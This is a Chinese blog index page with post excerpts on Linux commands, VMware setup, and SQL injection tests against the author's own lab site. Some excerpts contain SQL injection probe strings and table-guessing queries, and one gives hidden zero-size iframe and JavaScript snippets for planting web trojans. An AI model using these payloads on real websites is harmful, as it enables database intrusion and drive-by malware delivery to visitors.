摘要:1、 ps命令 R 正在运行 S 中断、休眠状态 D 不可中断 Z 僵死、僵尸进程 T 停止进程 2、 top命令 top - 15:19:10 up 11 min, 2 users, load average: 0.08, 0.33, 0.39 系统时间 已运行时间 登录终端数 系统负载情况(1分 阅读全文
posted @ 2019-09-08 22:45 茶乐乐 阅读 (17) 评论 (0) 编辑
摘要:安装配置虚拟机 VMware WorkStation虚拟机软件是一款桌面计算机虚拟软件,让用户能够在单一主机上同时运行多个不同的操作系统。每个虚拟操作系统的硬盘分区、数据配置都是独立的,而且多台虚拟机可以构建为一个局域网。Linux系统对硬件设备的要求很低,我们没有必要再买一台电脑,课程实验用虚拟机 阅读全文
posted @ 2019-09-07 22:19 茶乐乐 阅读 (21) 评论 (0) 编辑
摘要:1、鲁大师、驱动精灵 查看PC终端配置 2、RPM 含义 3、systemctl: systemctl start 服务名称 运行服务 ststemctl restart 服务名称 重启服务 systemctl stop 服务名称 停止服务 systemctl enable 服务名称 加入到启动项 阅读全文
posted @ 2019-09-07 21:33 茶乐乐 阅读 (35) 评论 (0) 编辑
摘要:前两篇文章介绍了攻击者通过构造SQL语句来获得“非授权信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。 测试环境跟上一篇相同, MSQL + asp.net + win7。前面 阅读全文
posted @ 2019-06-19 22:59 茶乐乐 阅读 (70) 评论 (0) 编辑
摘要:接着上篇,还是新闻发布系统,上篇演示的盲注,其实还有更简单的办法。上篇是从新闻详细页面入侵成功,在下面的测试中入侵者发现新闻列表页面也存在相同的漏洞,呵呵呵,貌似从这里入侵更方便些。 这里测试环境跟上一篇相同, MSQL + asp.net 。新闻列表页面代码如下: 废话少说,开始吧。下面是文章列表 阅读全文
posted @ 2019-06-19 22:58 茶乐乐 阅读 (50) 评论 (0) 编辑
摘要:SQL注入原理 主要是攻击者,利用被攻击页面的一些漏洞(通常都是程序员粗心大意造成的),改变数据库执行的SQL语句,从而达到获取“非授权信息”的目的。 下面自己搭建了实验环境用于测试。 首先交待一下,测试环境 开发语言为 Asp.net ,数据库使用的 MSQL ,测试页面模拟了普通的新闻页面,UR 阅读全文
posted @ 2019-06-19 22:56 茶乐乐 阅读 (138) 评论 (0) 编辑
摘要:挂载概念 Linux中的根目录以外的文件要想被访问,需要将其“关联”到根目录下的某个目录来实现,这种关联操作就是“挂载”,这个目录就是“挂载点”,解除次关联关系的过程称之为“卸载”。 注意:“挂载点”的目录需要以下几个要求: (1)目录事先存在,可以用mkdir命令新建目录; (2)挂载点目录不可被 阅读全文
posted @ 2019-01-26 17:09 茶乐乐 阅读 (92) 评论 (0) 编辑
摘要:1.判断有无注入点; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) 判断是否 阅读全文
posted @ 2019-01-10 08:33 茶乐乐 阅读 (138) 评论 (0) 编辑
摘要:一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<scr 阅读全文
posted @ 2019-01-09 12:08 茶乐乐 阅读 (101) 评论 (0) 编辑